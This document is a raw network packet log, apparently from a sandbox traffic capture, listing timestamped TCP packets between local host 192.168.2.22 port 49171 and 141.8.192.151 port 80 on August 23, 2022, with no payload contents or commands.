Aug 23, 2022 13:42:48.800379992 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800417900 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800434113 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800473928 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800492048 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800539017 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800548077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800580025 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800602913 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800649881 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800658941 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800693035 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800717115 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800756931 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800771952 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800812006 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800827980 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800873041 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800880909 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800911903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800935984 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800977945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800992012 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801003933 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801024914 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801063061 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801110983 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801120043 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801152945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801172972 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801218987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801228046 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801259995 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801281929 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801323891 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801338911 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801357031 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801376104 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801410913 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801450968 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801466942 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801506996 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801525116 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801570892 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801579952 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801611900 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801635027 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801676989 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801691055 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801702976 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801731110 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801759005 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801800013 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801814079 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801853895 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.801872015 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.801912069 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.802064896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862068892 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862240076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862263918 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862282991 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862293005 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862302065 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862314939 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862329006 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862344027 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862350941 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862365961 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862374067 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862387896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862400055 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862407923 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862426043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862437010 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862452030 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862462044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862479925 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862492085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862505913 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862514019 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862533092 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862543106 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862559080 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862569094 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862586975 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862611055 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862616062 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862626076 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862637043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862643957 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862663031 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862670898 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862690926 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862696886 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862715006 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862729073 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862740993 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862746954 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862766027 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862773895 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862792969 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862798929 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862817049 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862833023 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862839937 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862853050 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862862110 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862874985 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862888098 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862895966 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862914085 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862930059 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862940073 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862948895 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.862965107 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.862987041 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863002062 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863023996 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863032103 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863049984 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863058090 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863075018 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863082886 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863094091 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863111973 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863130093 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863137007 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863154888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863163948 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863171101 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863188982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863205910 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863212109 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863229036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863239050 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863248110 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863265991 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863285065 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863292933 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863313913 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863318920 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863328934 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863343000 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863369942 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863380909 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863389015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863406897 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863426924 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863435030 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863452911 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863459110 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863467932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863487005 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863504887 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863511086 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863528013 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863538027 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863544941 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863564014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863581896 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863588095 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863605976 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863615990 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863625050 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863643885 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863652945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863671064 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863686085 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863696098 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863713980 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863723040 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863729954 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863748074 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863765955 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863773108 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863790989 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863799095 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863806009 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863823891 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863842010 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863848925 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863867044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863874912 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863883018 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863902092 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863919973 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863924980 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863941908 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863950014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863957882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.863976002 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.863993883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864001036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864017963 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864041090 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864053011 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864063025 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864064932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864073992 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864079952 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864099026 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864109993 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864124060 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864130974 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864147902 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864167929 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864175081 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864183903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864200115 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864207029 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864226103 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864239931 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864263058 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864268064 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864270926 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864283085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864299059 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864304066 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864321947 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864336014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864342928 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864353895 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864363909 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864371061 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864389896 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864401102 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864417076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864422083 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864440918 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864453077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864468098 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864479065 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864495039 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864500999 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864517927 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864538908 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864545107 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864557981 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864568949 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864577055 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864595890 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864610910 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864620924 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864628077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864645958 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864664078 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864667892 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864682913 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864692926 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864701033 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864720106 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864734888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864744902 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864754915 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864770889 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864785910 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864794016 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864809990 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864820004 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864830017 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864845991 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864852905 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864871025 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864880085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864897013 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864912033 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864918947 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864933014 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864949942 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864958048 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.864976883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.864995003 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865000963 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865012884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865026951 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865034103 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865053892 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865067005 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865081072 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865087986 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865107059 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865117073 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865132093 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865148067 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865154982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865170956 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865178108 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865195036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865206003 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865212917 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865231037 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865242004 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865258932 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865266085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865283966 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865295887 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865310907 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865318060 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865336895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865354061 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865365028 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865372896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865391970 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865405083 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865417957 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865425110 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865443945 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865457058 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865470886 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865482092 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865497112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865504980 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865524054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865540028 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865550041 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865557909 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865576982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865588903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865606070 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865612030 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865632057 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865643024 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865658045 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865664959 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865681887 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865703106 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865710974 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865719080 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865739107 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865747929 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865765095 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865773916 CEST	49171	80	192.168.2.22	141.8.192.151
